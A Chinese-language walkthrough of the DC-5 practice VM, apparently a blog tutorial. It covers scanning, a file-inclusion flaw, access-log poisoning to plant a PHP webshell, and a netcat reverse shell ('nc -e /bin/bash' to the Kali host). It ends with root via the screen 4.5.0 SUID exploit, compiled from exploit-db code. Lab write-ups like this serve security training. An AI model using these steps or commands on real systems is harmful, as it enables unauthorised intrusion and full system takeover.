艾巴索dc05使用教程（DC-5靶場提權教程）

2023-04-16 11:41:51 1

DC-5

1.取得靶機，將靶機複製在自己電腦上，打開靶機

選擇編輯此虛擬機，點擊網絡配適器，選擇NAT模式然後確定

開啟此虛擬機

到這步後我們開啟kali虛擬機，同樣選擇編輯此虛擬機，點擊網絡配適器，選擇NAT模式然後確定

打開kali虛擬機，其密碼為kali

我們先獲取root權限，輸入su root，password為123456（Linux內輸入password是看不見的）

先用ifconfig查看kali的ip地址為192.168.126.129

我們用nmap掃描收集信息，輸入nmap -sP 192.168.126.0/24 -oN nmap.sV

得到靶機ip：192.168.126.132，對其進行埠掃描

可以看到開放了80埠和111埠，111埠是RPC服務，感覺沒有什麼可以利用的點，我們去瀏覽器訪問80埠試試（可以打開kali自帶的火狐瀏覽器，使用kali自帶瀏覽器前需要打開burpsuit，也可以用自己電腦的瀏覽器）

輸入剛剛獲得的靶機ip，例如我的就是http://192.168.126.132

發現這是一個動態頁面，可以嘗試去提交一些東西。

我們點擊右上角Contact，往下滑發現可以輸入

提交後可以發現，本人電腦的Microsoft Edge因為改成了翻譯系統，一般情況會顯示DC-5 is alive

掃描web目錄，輸入dirb http://192.168.126.132

很可惜此處沒有太多有價值的東西，繼續瀏覽可以發現contact可以發現年份會隨著頁面刷新而刷新

之前在thinkyou.php中看到了這種情況（網頁刷新一次，年份都會發生變化），因此我們猜測thinkyou.php調用了footer.php，於是想到了文件包含漏洞，輸入footer.php試試

看見頁面變化，我們回到kali，用kali自帶的burpsuite進行抓包

關於burpsuite的詳細配置教程我放在另外一個文檔裡面，沒有配置的小夥伴可以先配置一下

打開burpsuite後，返回瀏覽器界面

在開著intercept on的同時刷新瀏覽器頁面（回到瀏覽器按下f5）burp會自動抓包

點擊Action，選擇send to Repeater發送到Repeater

利用access.log。抓包在burpsuite-repeater中，把url修改為一句話木馬 Get ，回顯400 bad request

返回瀏覽器查看，哭看見頁面發生變化

滑到最底下是這樣的，可以看見顯示了php信息，意識到可以通過這個方式寫入木馬

我們返回burpsuite，寫入一句話木馬 GET .

（注意，這裡的POST['']裡面的內容是可以更改的，也就是之後用蟻劍連接的密碼

接著我們使用蟻劍連接，此處我的蟻劍是windows版本的，所以密碼就是POST內的內容1234

點擊添加數據

點擊測試連接，可以看見連接成功

我們回到kali，輸入nc -lvvp 1234開啟這個埠的監聽

然後在蟻劍中，點擊右鍵，選擇虛擬終端，輸入nc -e /bin/bash 192.168.126.129 1234進行shell反彈

可以在kali中看見成功

返回kali交互式 輸入python -c 'import pty;pty.spawn("/bin/bash")'

使用find / -perm -4000 2>/dev/null查找具有SUID權限的文件，發現screen-4.5.0。

使用searchsploit查找該命令漏洞：searchsploit screen 4.5.0 -w

兩個文件是相同的，41152.txt是告訴你怎麼做，之前的靶機也出現過，顯然41154.sh已經把文件給了，所以選擇下載41154.sh

發現有兩個漏洞

先查看第一個

將第一個複製到桌面

cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh

查看該文件

發現其在 /tmp 路徑下編譯了兩個 c，並執行了若干命令

按照腳本提示，先將第一部分內容寫到libhax.c中(一共有三個部分)

第一步在桌面創建一個文件夾存放三個部分的腳本

使用命令vim創建第一個libhax.c

然後編譯這個腳本

gcc -fPIC -shared -ldl -o libhax.so libhax.c

、

使用vim命令創建第二個rootshell.c，複製粘貼完內容後按下esc輸入：wq保存退出

再編譯

gcc -o rootshell rootshell.c

最後一個部分dc5.sh同理，但是需要注意的是下面需要轉換一下格式

執行完命令後，可以看見在桌面home/dc-5文件夾有五個文件

將帶有.c的文件刪除，在kali中使用rm命令

再回到文件夾內可以看見

然後我們回到中國蟻劍，將文件上傳到tmp文件裡面，需要注意的是我們一定要講文件傳到根目錄下，而不是var，/var是源碼

然後重命名，將路徑去掉

回到kali反彈的shell（步驟和之前一樣），進入到天麻片、目錄裡面

然後為dc5.sh添加可以執行權限，輸入chmod x dc5.sh

驗證權限，切換到/root根目錄下找到flag，滲透成功